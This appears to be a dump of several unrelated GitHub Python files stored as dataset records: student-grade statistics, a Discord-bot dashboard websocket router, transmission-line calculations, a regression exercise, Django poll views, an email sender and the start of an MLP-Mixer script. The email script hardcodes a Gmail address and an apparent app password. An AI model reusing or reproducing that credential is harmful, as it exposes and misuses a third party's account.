0\nnumber_middle_grades = 0\nnumber_good_grades = 0\nnumber_very_good_grades = 0\nnumber_excellent_grades = 0\nfor i in range(1, count_students + 1):\n exam_grade = float(input())\n all_sum_grades += exam_grade\n if 2 <= exam_grade <= 2.99:\n number_middle_grades += 1\n elif 3 <= exam_grade <= 3.99:\n number_good_grades += 1\n elif 4 <= exam_grade <= 4.99:\n number_very_good_grades += 1\n else:\n number_excellent_grades += 1\nprint(f\"Top students: {number_excellent_grades / count_students * 100:.2f}%\")\nprint(f\"Between 4.00 and 4.99: {number_very_good_grades / count_students * 100:.2f}%\")\nprint(f\"Between 3.00 and 3.99: {number_good_grades / count_students * 100:.2f}%\")\nprint(f\"Fail: {number_middle_grades / count_students * 100:.2f}%\")\nprint(f\"Average: {all_sum_grades / count_students:.2f}\")\n\n","repo_name":"VladiNikolov/python_basics","sub_path":"PB _More_Exercises/For_Loop/04_grades.py","file_name":"04_grades.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"19567249846","text":"import asyncio\nimport json\nfrom collections import namedtuple\n\nfrom aiohttp import client\n\nfrom Utils import Redis\nfrom Utils.Configuration import API_LOCATION\nfrom Utils.Perms import DASH_PERMS\nfrom routers.websocket import socket_by_subscription\n\n# stats handlers\nstat_sender = None\n\n\nasync def stats_start():\n global stat_sender\n stat_sender = asyncio.create_task(stats_sender())\n asyncio.ensure_future(stat_sender)\n\n\nasync def stats_sender():\n while True:\n await asyncio.sleep(10)\n await send_to_subscribers(\"stats\", **await Redis.get_redis().hgetall(\"botstats\"))\n\n\nasync def stats_send(websocket, subkey):\n global stat_sender\n if stat_sender.cancelled() or stat_sender.done():\n stat_sender = asyncio.create_task(stats_sender())\n await websocket.send_json({\n \"type\": \"stats\",\n \"content\": await Redis.get_redis().hgetall(\"botstats\")\n })\n\n\nasync def stats_end():\n stat_sender.cancel()\n\n\nasync def guilds_start(websocket, subkey):\n # tell the bot to send this user's guilds\n await Redis.send_to_bot(\"user_guilds\", user_id=subkey)\n\n # get non gearbot servers\n headers = {\n \"Authorization\": f\"Bearer {websocket.auth_info.user.api_token}\"\n }\n\n async with client.ClientSession() as session_pool:\n\n async with session_pool.get(f\"{API_LOCATION}/users/@me/guilds\", headers=headers) as resp:\n guild_list = await resp.json()\n if not isinstance(guild_list, list):\n from Utils.Auth import deauth_user\n await deauth_user(websocket.auth_info.user.id)\n await websocket.auth_info.delete()\n return False\n to_send = dict()\n for guild in guild_list:\n if guild[\"owner\"] or guild[\"permissions\"] & 32 == 32:\n to_send[str(guild[\"id\"])] = {\n \"id\": str(guild[\"id\"]),\n \"name\": str(guild[\"name\"]),\n \"icon\": guild[\"icon\"]\n }\n await websocket.send_json({\n \"type\": \"guilds\",\n \"content\": {\n \"type\": \"all_guilds\",\n \"guilds\": to_send\n }\n })\n\n await session_pool.close()\n\n\ndef is_last_subkey(channel, subkey):\n for holder in socket_by_subscription[channel]:\n if holder.subkey == subkey:\n return False\n return True\n\n\nasync def guilds_end(websocket, subkey):\n if is_last_subkey(\"guilds\", subkey):\n await Redis.send_to_bot(\"user_guilds_end\", user_id=subkey)\n\n\nasync def always_allowed(info, subkey):\n return True\n\n\nasync def user_id_check(info, subkey):\n return info is not None and subkey == str(info.user_id)\n\n\ndef needs_perm(perm):\n async def actual_checker(info, subkey):\n if info is None:\n return False\n user_perms = await Redis.ask_the_bot(\"guild_user_perms\", guild_id=subkey, user_id=info.user_id)\n return (user_perms & perm) == perm\n\n return actual_checker\n\n\nasync def guild_info_start(websocket, subkey):\n await Redis.send_to_bot(\"guild_info_watch\", guild_id=subkey, user_id=websocket.auth_info.user_id)\n\n\nasync def guild_info_end(websocket, subkey):\n await Redis.send_to_bot(\"guild_info_watch_end\", guild_id=subkey, user_id=websocket.auth_info.user_id)\n\n\nChannelHandlers = namedtuple(\"ChannelHandlers\", \"allowed start add remove end\")\nhandlers = {\n \"stats\": ChannelHandlers(always_allowed, stats_start, stats_send, None, stats_end),\n \"guilds\": ChannelHandlers(user_id_check, None, guilds_start, guilds_end, None),\n \"guild_info\": ChannelHandlers(needs_perm(DASH_PERMS.ACCESS), None, guild_info_start, guild_info_end, None),\n \"guild_settings\": ChannelHandlers(needs_perm(DASH_PERMS.VIEW_CONFIG), None, None, None, None)\n # TODO: acutally make this do something\n}\n\n\nasync def subscribe(websocket, message):\n new = False\n channel = message[\"channel\"]\n\n if channel not in handlers:\n await websocket.send_json(dict(type=\"error\", content=\"Unknown channel!\"))\n return\n handler = handlers[channel]\n subkey = message.get(\"subkey\", None)\n if not await handler.allowed(getattr(websocket, \"auth_info\", None), subkey):\n await websocket.send_json(dict(type=\"error\", content=\"You are not allowed to subscribe to this channel!\"))\n return\n\n # create channel list if needed\n if channel not in socket_by_subscription:\n socket_by_subscription[channel] = list()\n new = True\n\n # subscribe and hit that bell for updates!\n if channel not in websocket.active_subscriptions:\n socket_by_subscription[channel].append(websocket)\n websocket.active_subscriptions[channel] = str(subkey)\n else:\n await websocket.send_json({\n \"type\": \"error\",\n \"content\": f\"You are already subscribed to {channel}\"\n })\n\n # NEW CHANNEL HYPE!!!\n if new and handlers[channel].start is not None:\n await handlers[channel].start()\n\n if handlers[channel].add is not None:\n await handlers[channel].add(websocket, subkey)\n\n\nasync def unsubscribe(websocket, message):\n channel = message[\"channel\"]\n\n # you're no longer interesting, unsubscribed\n\n socket_by_subscription[channel].remove(websocket)\n if handlers[channel].remove is not None:\n await handlers[channel].remove(websocket, websocket.active_subscriptions[channel])\n del websocket.active_subscriptions[channel]\n\n if len(socket_by_subscription[channel]) is 0:\n # we lost all our subscribers, better delete our channel and retire\n del socket_by_subscription[channel]\n if handlers[channel].end is not None:\n await handlers[channel].end()\n\n\nasync def send_to_subscribers(channel, subkey=None, uid=None, **kwargs):\n if channel in socket_by_subscription:\n for socket in socket_by_subscription[channel]:\n auth_info = getattr(socket, \"auth_info\", None)\n if socket.active_subscriptions[channel] == str(subkey) and (uid is None or (auth_info is not None and auth_info.user_id == int(uid))):\n await socket.send_json(dict(type=channel, content=kwargs))\n","repo_name":"gearbot/Dashboard-api","sub_path":"routers/websocket/subscriptions.py","file_name":"subscriptions.py","file_ext":"py","file_size_in_byte":6190,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"60"} +{"seq_id":"1231548200","text":"import sys\r\n\r\nn, *xyh = map(int, sys.stdin.read().split())\r\nxyh = list(zip(*[iter(xyh)] * 3))\r\n\r\ndef conflict(cx, cy, ch, x, y, h):\r\n return h != max(ch - abs(x - cx) - abs(y - cy), 0)\r\n\r\ndef main():\r\n for x, y, h in xyh:\r\n if h >= 1:\r\n xt, yt, ht = x, y, h\r\n break\r\n\r\n for cx in range(101):\r\n for cy in range(101):\r\n ch = ht + abs(cx - xt) + abs(cy - yt)\r\n for x, y, h in xyh:\r\n if conflict(cx, cy, ch, x, y, h):\r\n break\r\n else:\r\n return cx, cy, ch\r\n\r\nif __name__ == '__main__':\r\n ans = main()\r\n print(*ans, sep=' ')\n","repo_name":"kagemeka/atcoder-submissions","sub_path":"jp.atcoder/abc112/abc112_c/9364041.py","file_name":"9364041.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"6340054479","text":"from linha_transmissao import Linha_transmissao\r\nfrom metodos_linhas import raio_eq, Pnat\r\nfrom numpy import sqrt\r\nimport numpy as np\r\nfrom numpy.linalg import inv\r\n\r\nnp.set_printoptions(linewidth=500)\r\n\r\n#------------------------------------------------------------------------------------------------------\r\n# Dados dos condutores de fase\r\n# Name: (r0,r1,pfase) ohms/m\r\nCondutoresEspecs = {\"Bluejay\": (8.702*10**-3, 15.977*10**-3, 29.544*10**-9),\r\n \"Rail\": (8.702*10**-3, 14.796*10**-3, 29.538*10**-9),\r\n \"Ruddy\": (7.821*10**-3, 14.364*10**-3, 29.559*10**-9),\r\n \"Grossbeak\": (7.456*10**-3, 12.573*10**-3, 29.538*10**-9),\r\n \"Dove\": (6.988*10**-3, 11.773*10**-3, 29.567*10**-9),\r\n \"Penguim\": (4.123*10**-3, 7.150*10**-3, 28.554*10**-9),\r\n \"Leghorn\": (4.840*10**-3, 6.7180*10**-3, 29.586*10**-9),\r\n \"Minorca\": (4.390*10**-3, 6.0960*10**-3, 29.579*10**-9),\r\n \"3/8 EHS\": (0, 4.570*10**-3, 276.470*10**-9)}\r\n#------------------------------------------------------------------------------------------------------\r\n#Dados das posições espaciais dos condutores. Inicialmente o dicionario possui só duas linhas pois nelas foram dados direto as coordenadas, as outras precisamos fazer alguns calculos antes e serão adicionadas aos poucos\r\n#Name: (rext,rint,(Xc-1,Xc0,Xc1),(Yc-1,Yc,Yc+1),(Xpr,Ypr,Xpr2,Ypr2),n)\r\n# n é o numero de condutores por fase\r\n# Xc cordenadas dos centros dos 4 condutores\r\n# Yc cordenadas dos centros dos 4 condutores PS: na formula subtrai por 2/3 da flecha\r\n#Pros dois primeiros botei o raio como sendo o db*sqrt(2)/2\r\nCondutoresPos = {\"Bluejay\": (raio_eq(4, CondutoresEspecs[\"Bluejay\"][1], .475*sqrt(2)/2),raio_eq(4, CondutoresEspecs[\"Bluejay\"][0], .475*sqrt(2)/2) ,(-15.85, 0, 15.85), (35.9-2*20.9/3, 35.9-2*20.9/3, 35.9-2*20.9/3), (-14.45, 45.9-2*14.7/3, 14.45, 45.9-2*14.7/3), 4),\r\n \"Rail Normal\": (raio_eq(4, CondutoresEspecs[\"Rail\"][1],.475*sqrt(2)/2), raio_eq(4, CondutoresEspecs[\"Rail\"][0],.475*sqrt(2)/2), (-15, -11, -6, 6, 11, 15), (23.2, 33.2, 23.2, 23.2, 33.2, 23.2), (-8.8, 42.7, 8.8, 42.7), 4)\r\n }\r\n#------------------------------------------------------------------------------------------------------\r\n\r\n# ============ 500kV rail convencional ===============\r\n#2 ultimos elementos sao pararraio, da forma (x, y)\r\nn_rail_comp = 3\r\nR_rail_compExt = (CondutoresEspecs[\"Rail\"][1] *\r\n np.sqrt(3))/3 + CondutoresEspecs[\"Rail\"][1]\r\n\r\nR_rail_compInt = (CondutoresEspecs[\"Rail\"][0] *\r\n np.sqrt(3))/3 + CondutoresEspecs[\"Rail\"][0]\r\n\r\nxy = ((-11.000, 10.736), (-10.771, 11.132),\r\n (-11.229, 11.132), (0.000, 10.736), (0.229,\r\n 11.132), (-0.229, 11.132), (11.000, 10.736),\r\n (10.771, 11.132), (11.229, 11.132), (-6.000, 22.000), (6.000, 22.000))\r\n\r\n#centro dos condutores equivalentes (os dois ultimos pares sao dos para-raios)\r\nxyc = (((-10.771 + -11.229)/2, (2*11.132 + 10.736)/3),\r\n ((0.229 + -0.229)/2, (2*11.132 + 10.736)/3),\r\n ((10.771 + 11.229)/2, (2*11.132 + 10.736)/3),\r\n (-6.000, 22.000), (6.000, 22.000))\r\n\r\n\r\nCondutoresPos[\"Rail Convencional\"] = (raio_eq(3, CondutoresEspecs[\"Rail\"][1], R_rail_compExt),raio_eq(3, CondutoresEspecs[\"Rail\"][0], R_rail_compInt),\r\n (xyc[0][0], xyc[1][0], xyc[2][0]),\r\n (xyc[0][1], xyc[1][1], xyc[2][1]),\r\n (xyc[3][0], xyc[3][1], xyc[4][0], xyc[4][1]), 3)\r\n\r\n\r\n# ================= 500kV rail compacto ====================\r\n#2 ultimos elementos sao pararraio, da forma (x, y)\r\n\r\nn_rail_comp = 4\r\nR_rail_comp = 0\r\n\r\nxy2 = ((-4.271, 10.771), (-4.271, 11.229), (-4.729, 11.229), (-4.729, 10.771), (0.229, 15.271),\r\n (0.229, 15.729), (-0.229, 15.729), (-0.229, 15.271), (4.271,10.771),\r\n (4.271, 11.229), (4.729, 11.229), (4.729, 10.771), (-3.500, 26.000), (3.500, 26.000))\r\n \r\n# centro dos condutores equivalentes (os dois ultimos pares sao dos para-raios)\r\nxy2c = (((-4.271 + -4.729)/2, (10.771+11.229)/2),\r\n ((0.229 + -0.229)/2, (15.729 + 15.271)/2),\r\n ((4.271 + 4.729)/2, (11.229 + 10.771)/2),\r\n (-3.500, 26.000), (3.500, 26.000))\r\n \r\n\r\nRext = sqrt((xy2c[0][0] - xy2[0][0])**2 + (xy2c[0][1] - xy2[0][1])**2)/2\r\nRint = Rext*CondutoresEspecs[\"Rail\"][0]/CondutoresEspecs[\"Rail\"][1]\r\n\r\nCondutoresPos[\"Rail Compacto\"] = (raio_eq(4, CondutoresEspecs[\"Rail\"][1], Rext),raio_eq(4, CondutoresEspecs[\"Rail\"][0], Rint),\r\n (xy2c[0][0], xy2c[1][0], xy2c[2][0]),\r\n (xy2c[0][1], xy2c[1][1], xy2c[2][1]),\r\n (xy2c[3][0], xy2c[3][1], xy2c[4][0], xy2c[4][1]), 4)\r\n\r\n# =============== 500kV rail recapacitado =====================\r\n#2 ultimos elementos sao pararraio, da forma (x, y)\r\nn_rail_cap = 4\r\nR_rail_cap1 = 0\r\nR_rail_cap2 = 0\r\n\r\n# raio do condutor equivalente\r\nxy3 = ((-7.229, 8.639), (-7.229, 10.500), (-6.771, 10.500), (-6.771,\r\n 8.639), (-0.229, 10.500),\r\n (-0.229, 9.876), (0.229, 9.876), (0.229, 10.500), (7.229,\r\n 8.639), (7.229, 10.500), (6.771, 10.500),\r\n (6.771, 8.639), (-5.000, 20.500), (5.000, 20.500))\r\n\r\nxy3c = (((-7.229 + -6.771)/2, (8.639 + 10.500)/2),\r\n (((-0.229 + 0.229)/2, (9.876 + 10.500)/2)),\r\n (((6.771 + 7.229)/2, (8.639 + 10.500)/2)),\r\n (-5.000, 20.500), (5.000, 20.500))\r\n\r\n\r\nRext = sqrt((xy3c[0][0] - xy3[0][0])**2 + (xy3c[0][1] - xy3[0][1])**2)/2\r\nRint = Rext*CondutoresEspecs[\"Rail\"][0]/CondutoresEspecs[\"Rail\"][1]\r\n\r\n\r\nCondutoresPos[\"Rail Recapacitado\"] = (raio_eq(4, CondutoresEspecs[\"Rail\"][1], Rext),raio_eq(4, CondutoresEspecs[\"Rail\"][0], Rint),\r\n (xy3c[0][0], xy3c[1][0], xy3c[2][0]),\r\n (xy3c[0][1], xy3c[1][1], xy3c[2][1]),\r\n (xy3c[3][0], xy3c[3][1], xy3c[4][0], xy3c[4][1]), 4)\r\n\r\n# =================== 345kv ruddy ==========================\r\n#2 ultimos elementos sao pararraio, da forma (x, y)\r\nn_ruddy = 2\r\n# raio do condutor equivalente é igual ao diametro\r\nR_ruddy = 2*CondutoresEspecs[\"Ruddy\"][1]\r\nxy1 = ((-7.229, 10.5), (-6.771, 10.500), (-0.229, 10.500), (0.229,\r\n 10.500), (7.229, 10.500),\r\n (6.771, 10.500), (-5.000, 20.500), (5.000, 20.500))\r\n\r\nxy1c = (((-7.229 + -6.771)/2, 10.5),\r\n ((-0.229 + 0.229)/2, 10.5),\r\n ((7.229 + 6.771)/2, 10.5),\r\n (-5.000, 20.500), (5.000, 20.500))\r\n\r\n\r\nRext = sqrt((xy1c[0][0] - xy1[0][0])**2 + (xy1c[0][1] - xy1[0][1])**2)/2\r\nRint = Rext*CondutoresEspecs[\"Ruddy\"][0]/CondutoresEspecs[\"Ruddy\"][1]\r\nR1 = sqrt((xy1c[0][0] - xy1[0][0])**2 + (xy1c[0][1] - xy1[0][1])**2)\r\n\r\nCondutoresPos[\"Ruddy\"] = (raio_eq(2, CondutoresEspecs[\"Ruddy\"][1], Rext),raio_eq(2, CondutoresEspecs[\"Ruddy\"][0], Rint),\r\n (xy1c[0][0], xy1c[1][0], xy1c[2][0]),\r\n (xy1c[0][1], xy1c[1][1], xy1c[2][1]),\r\n (xy1c[3][0], xy1c[3][1], xy1c[4][0], xy1c[4][1]), 4)\r\n\r\n\r\n#===================================================================================================\r\n#========================== CALCULO DOS PARAMETROS PARA CADA CONDUTOR ==============================\r\n#===================================================================================================\r\n\r\n#Lembrando os parametros para chamar a classe abaixo:\r\n#(self, r_int, r_ext, nfase, npr, xc, yc, rhoc, rhoc_pr, rf, rpr):\r\nVs = [750000, 500000, 500000, 500000, 500000, 345000] #Voltagem dos condutores. Será util para o calculo da potencia\r\nj = 0 #Contagem de iterações feitas. Util para escolher a voltagem\r\n\r\nprint((20*2+7)*'=')\r\nprint(20*'=' + \" Resultados \" + 20*'=')\r\nprint((20*2+7)*'=' + '\\n')\r\nfor i in CondutoresPos:\r\n #matrizes de sequencia\r\n a = np.exp(1j * np.deg2rad(120))\r\n a2 = a**2\r\n A = np.array([[1, 1, 1], [1, a2, a], [1, a, a2]])\r\n zero = np.zeros((3,3))\r\n\r\n #Para saber qual tipo de condutor trabalharemos\r\n if i == \"Bluejay\":\r\n nameSpec = \"Bluejay\"\r\n else:\r\n nameSpec = \"Rail\"\r\n\r\n npr = 2 #numero de para-raios\r\n #Necessario fazer um if para o caso do rail normal pois é o unico circuito duplo, então devemos tomar alguns cuidados\r\n if i == \"Rail Normal\":\r\n #Atribuimos os valores que serão utilizados para chamar a classe. Raios, numero de condutores, posição espacial dos condutores, rhos\r\n nfase = 6\r\n r_ext = CondutoresPos[i][0]\r\n r_int = CondutoresPos[i][1]\r\n xc = np.concatenate((np.array(CondutoresPos[i][2]), np.array([CondutoresPos[i][4][0]]), np.array([CondutoresPos[i][4][2]])))\r\n #xc_n = np.concatenate((np.array(-CondutoresPos[i][2]), np.array(-[CondutoresPos[i][4][0]]), np.array(-[CondutoresPos[i][4][2]])))\r\n yc = np.concatenate(( np.array(CondutoresPos[i][3]), np.array([CondutoresPos[i][4][1]]) , np.array([CondutoresPos[i][4][3]]) ))\r\n #yc_n = np.concatenate(( np.array(-CondutoresPos[i][3]), np.array(-[CondutoresPos[i][4][1]]) , np.array(-[CondutoresPos[i][4][3]]) ))\r\n rhoc = CondutoresEspecs[nameSpec][2]\r\n rhoc_pr = CondutoresEspecs[\"3/8 EHS\"][2]\r\n rf = r_ext\r\n rpr = CondutoresEspecs[\"3/8 EHS\"][1]\r\n print(\"Linha: \" + i)\r\n Linha = Linha_transmissao(r_int, r_ext, nfase, npr, xc, yc, rhoc, rhoc_pr, r_ext, rpr)\r\n \r\n #Uma vez construida a linha podemos determinar seus parametros de impedancia e admitancia\r\n Z = Linha.impedancia()\r\n Y = Linha.admitancia()\r\n Z = Z.astype(np.csingle) #Codigo necessario para o python ler o tipo de variavel \r\n Y = Y.astype(np.csingle)\r\n #Redução de Kron para eliminar o para-raio\r\n Zabc = 0j + np.zeros((6,6))\r\n Yabc = 0j + np.zeros((6,6))\r\n Zabc = Z[0:nfase,0:nfase] - Z[0:nfase,nfase:] @ inv(Z[nfase:,nfase:]) @ Z[nfase:,0:nfase]\r\n Yabc = Y[0:nfase,0:nfase] - Y[0:nfase,nfase:] @ inv(Y[nfase:,nfase:]) @ Y[nfase:,0:nfase]\r\n \r\n #A = [[A, 0] matriz de sequencia precisa ser 6x6 agr\r\n # [0, A]]\r\n aux1 = np.concatenate((A,zero))\r\n aux2 = np.concatenate((zero,A))\r\n A = np.concatenate((aux1,aux2),axis=1) #matriz de sequencia para o caso 6x6\r\n \r\n \r\n else: #Casos onde o circuito é simples\r\n #(rext,rint,(Xc-1,Xc0,Xc1),(Yc-1,Yc,Yc+1),(Xpr,Ypr,Xpr2,Ypr2),n)\r\n r_ext = CondutoresPos[i][0]\r\n r_int = CondutoresPos[i][1]\r\n npr = 2\r\n nfase = 3\r\n xc = np.concatenate((np.array(CondutoresPos[i][2]), np.array([CondutoresPos[i][4][0]]), np.array([CondutoresPos[i][4][2]])))\r\n yc = np.concatenate(( np.array(CondutoresPos[i][3]), np.array([CondutoresPos[i][4][1]]) , np.array([CondutoresPos[i][4][3]]) ))\r\n rhoc = CondutoresEspecs[nameSpec][2]\r\n rhoc_pr = CondutoresEspecs[\"3/8 EHS\"][2]\r\n rf = r_ext\r\n rpr = CondutoresEspecs[\"3/8 EHS\"][1]\r\n\r\n\r\n print(\"Linha: \" + i)\r\n Linha = Linha_transmissao(r_int, r_ext, nfase, npr, xc, yc, rhoc, rhoc_pr, r_ext, rpr)\r\n Z = Linha.impedancia()\r\n Y = Linha.admitancia()\r\n Z = Z.astype(np.csingle)\r\n Y = Y.astype(np.csingle)\r\n #Retiramos as info do pararaio das matrizes atraves da reducao de kron\r\n Zabc = 0j + np.zeros((3,3))\r\n Yabc = 0j + np.zeros((3,3))\r\n\r\n Zabc = Z[0:nfase,0:nfase] - Z[0:nfase,nfase:] @ inv(Z[nfase:,nfase:]) @ Z[nfase:,0:nfase]\r\n Yabc = Y[0:nfase,0:nfase] - Y[0:nfase,nfase:] @ inv(Y[nfase:,nfase:]) @ Y[nfase:,0:nfase]\r\n \r\n #recuperação das matrizes de sequencia\r\n z012 = inv(A)@Zabc@A\r\n y012 = inv(A)@Yabc@A\r\n \r\n #Utilizamos as impedancias e admitancias de sequencia positiva para o calculo da potencia natural do circuito\r\n if len(A)==3:\r\n Pnatural = Pnat(Vs[j], z012[1][1], y012[1][1])\r\n elif len(A)==6: #Em circuitos duplos multiplicamos a potencia por dois pois nossos calculos são baseados em 1 linha\r\n Pnatural = 2*Pnat(Vs[j], z012[1][1], y012[1][1])\r\n\r\n print(\"Impedancia Z+ = {} Ohms\" .format(z012[1][1]))\r\n print(\"Admitância Y+ = {} Ohms\" .format(y012[1][1]))\r\n print(\"Potencia natural = {} MW\\n\" .format(round(Pnatural/(10**6),3)))\r\n j+=1\r\n","repo_name":"ll0pez10/transmissao-energia-eletrica","sub_path":"exercicio1.py","file_name":"exercicio1.py","file_ext":"py","file_size_in_byte":12543,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"75558456512","text":"\"\"\"\nAuthor: Charles Herrmann\n\nDate: 4/21/21\n\nObjective: In this challenge, we practice using linear regression techniques. \n\nTask: A group of five students enrolls in Statistics immediately after taking a Math aptitude test. Each student's Math aptitude test score, x, and Statistics course grade, y, can be expressed as the following list of (x, y) points:\n1. (95, 85)\n2. (85, 95)\n3. (80, 70)\n4. (70, 65)\n5. (60, 70)\nIf a student scored an 80 on the Math aptitude test, what grade would we expect them to achieve in Statistics? Determine the equation of the best-fit line using the least squares method, then compute and print the value of y when x = 80.\n\nInput Format: There are five lines of input; each line contains two space-separated integers describing a student's respective x and y grades:\n - 95 85\n - 85 95\n - 80 70\n - 70 65\n - 60 70\nIf you do not wish to read this information from stdin, you can hard-code it into your program.\n\"\"\"\n\n# Enter your code here. Print output to STDOUT\n\nfrom statistics import mean, pstdev\n\n\ndef pearson(x, y):\n n = len(x)\n mx, sx, my, sy = mean(x), pstdev(x), mean(y), pstdev(y)\n return sum((xi - mx) * (yi - my) for xi, yi in zip(x, y)) / (n * sx * sy)\n\n\ndef linear_regression(x, y):\n b = pearson(x, y) * pstdev(y) / pstdev(x)\n return mean(y) - b * mean(x), b\n\n\nif __name__ == \"__main__\":\n x = [95, 85, 80, 70, 60]\n y = [85, 95, 70, 65, 70]\n\n a, b = linear_regression(x, y)\n\n # to make prediction\n x_test = 80\n y_test = a + b * x_test\n print(f\"{y_test:.3f}\")\n","repo_name":"Cherrmann8/10_Days_of_Statistics","sub_path":"Day_8/least_square_regression_line.py","file_name":"least_square_regression_line.py","file_ext":"py","file_size_in_byte":1537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"33390613869","text":"from django.shortcuts import render, redirect\nfrom pools.models import *\nfrom .forms import QuestionForm, ChoiceForm\n\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.shortcuts import get_object_or_404, render\nfrom django.urls import reverse\n\ndef index(request):\n return render(request,'pools/index.html',{'questions':Question.objects.filter(closed=False).order_by('-pub_date')})\n\ndef exibir(request, question_id):\n question = Question.objects.get(id=question_id)\n return render(request, 'pools/question.html', {'question':question})\n\ndef exibir_fechada(request):\n questions = ''\n #try:\n questions = Question.objects.filter(closed=True)\n #except Exception as e:\n # print(e)\n # return render(request, 'pools/question.html', {'questions':questions}) \n return render(request, 'pools/question.html', {'questions':questions})\n \n\ndef results(request, question_id):\n question = Question.objects.get(id=question_id)\n return render(request, 'pools/results.html',{'question':question})\n\ndef vote(request, question_id, choice_id):\n choice = Choice.objects.get(id=choice_id)\n choice.votes += choice.votes\n choice.save()\n question = Question.objects.get(id=question_id)\n return render(request, 'pools/question.html', {'question':question})\n\ndef vote(request, question_id):\n question = Question.objects.get(id=question_id)\n choice = Choice.objects.get(id=request.POST['choice'])\n choice.votes += 1\n choice.save()\n return HttpResponseRedirect(reverse('results', args=(question.id,)))\n\ndef apagar(request, question_id):\n question = Question.objects.get(id=question_id)\n question.delete()\n return render(request,'pools/index.html',{'questions': Question.objects.filter(closed=False).order_by('-pub_date')})\n\ndef status(request, question_id):\n question = Question.objects.get(id=question_id)\n if question.closed == True:\n question.closed = False\n question.save()\n else:\n question.closed = True\n question.save()\n return render(request,'pools/index.html',{'questions': Question.objects.filter(closed=False).order_by('-pub_date')})\n\n\n'''def cadastrar(request):\n if request.method == 'POST':\n form = QuestionForm(request.POST)\n if form.is_valid():\n form.save()\n else:\n form = QuestionForm()\n return render(request, 'pools/new_quest.html', {'form':form})'''\n\ndef cadastrar(request):\n valor = ''\n if request.method == 'POST':\n form = QuestionForm(request.POST)\n if form.is_valid():\n quest = Question(question_text=form.cleaned_data['question_text'])\n quest.save()\n valor = form.cleaned_data['question_text']\n form = QuestionForm()\n else:\n form = QuestionForm()\n return render(request, 'pools/new_quest.html', {'form':form, 'valor':valor})\n\ndef responder(request, question_id):\n quest = Question.objects.get(id=question_id)\n valor = ''\n if request.method == 'POST':\n form = ChoiceForm(request.POST)\n if form.is_valid():\n quest.choices.create(choice_text=form.cleaned_data['choice_text'], \n votes=form.cleaned_data['votes'])\n valor = form.cleaned_data['choice_text']\n form = ChoiceForm() \n else:\n form = ChoiceForm()\n return render(request, 'pools/new_choice.html', {'form':form, 'question':quest, 'valor':valor})","repo_name":"infsolution/django","sub_path":"connectedin/pools/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"40877451370","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Jun 12 15:12:08 2021\r\n\r\n@author: \r\n\"\"\"\r\n \r\nimport smtplib, ssl\r\n\r\ndef WyslijWiadomosc(serwer,port,nadawca,haslo,wiadomosc):\r\n try:\r\n ssl_pool=ssl.create_default_context()\r\n with smtplib.SMTP_SSL(serwer,port,context=ssl_pool) as serwer:\r\n serwer.login(nadawca,haslo)\r\n serwer.sendmail(nadawca,odbiorca,wiadomosc)\r\n print(\"Wiadomosc wyslana pomyslnie!\")\r\n except:\r\n print(\"Nie udalo sie wyslac wiadomosci! : \")\r\n\r\n\r\nport=465\r\nserwer=\"smtp.gmail.com\"\r\nnadawca=\"wimimprojekt@gmail.com\"\r\nhaslo=\"yuxjyaazdouprhun\"\r\n\r\nodbiorca=input(\"Podaj odbiorcę: \")\r\ntemat=input(\"Podaj temat wiadomosci: \")\r\nwiadomosc1=input(\"Podaj wiadomosc: \")\r\npotwierdzenie=input(\"Czy na pewno chcesz wysłać wiadomosc do \"+odbiorca+\" ? (wpisz tak(t) lub nie(n))\")\r\n\r\nwiadomosc=\"Subject:\"+temat+\"\\nFROM: Informatyka projekt\\n\"+wiadomosc1\r\n\r\n\r\nif potwierdzenie == \"tak\" or potwierdzenie == \"Tak\" or potwierdzenie == \"t\" or potwierdzenie == \"T\":\r\n WyslijWiadomosc(serwer,port,nadawca,haslo,wiadomosc)\r\nelif potwierdzenie == \"nie\" or potwierdzenie == \"Nie\" or potwierdzenie == \"n\" or potwierdzenie == \"N\":\r\n print(\"Nie wysłano wiadomosci!\")\r\n \r\n \r\n\r\n\r\n\r\n \r\n\r\n","repo_name":"MartineLi96/Projekt_na_zaliczenie","sub_path":"Projekt_mail.py","file_name":"Projekt_mail.py","file_ext":"py","file_size_in_byte":1242,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"75165435390","text":"from pytest import xfail\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torchvision import datasets, transforms\nfrom einops.layers.torch import Rearrange\nimport numpy as np\n\nif torch.cuda.is_available():\n device = torch.device('cuda')\nelse:\n device = torch.device('cpu')\n \nprint('Using PyTorch version:', torch.__version__, ' Device:', device)\n\nbatch_size = 32\n\ntrain_dataset = datasets.MNIST('/codes/DeepLearning/DL/FFN/data', \n train=True, \n download=True, \n transform=transforms.ToTensor())\n\nvalidation_dataset = datasets.MNIST('/codes/DeepLearning/DL/FFN/data', \n train=False, \n transform=transforms.ToTensor())\n\ntrain_loader = torch.utils.data.DataLoader(dataset=train_dataset, \n batch_size=batch_size, \n shuffle=True)\n\nvalidation_loader = torch.utils.data.DataLoader(dataset=validation_dataset, \n batch_size=batch_size, \n shuffle=False)\n\n\nclass FeedForward(nn.Module):\n def __init__(self, dim, hidden_dim):\n super().__init__()\n self.net = nn.Sequential(\n nn.Linear(dim, hidden_dim),\n nn.GELU(),\n nn.Dropout(0.2),\n nn.Linear(hidden_dim, dim),\n nn.Dropout(0.2)\n )\n def forward(self, x):\n return self.net(x)\n\nclass MLPMixerBlock(nn.Module):\n def __init__(self, dim, num_patches, token_dim, channel_dim):\n super().__init__()\n self.token_mlp = nn.Sequential(\n nn.LayerNorm(dim),\n Rearrange('b n d -> b d n'),\n FeedForward(num_patches, token_dim),\n Rearrange('b d n -> b n d')\n )\n self.channel_mlp = nn.Sequential(\n nn.LayerNorm(dim),\n FeedForward(dim, channel_dim)\n 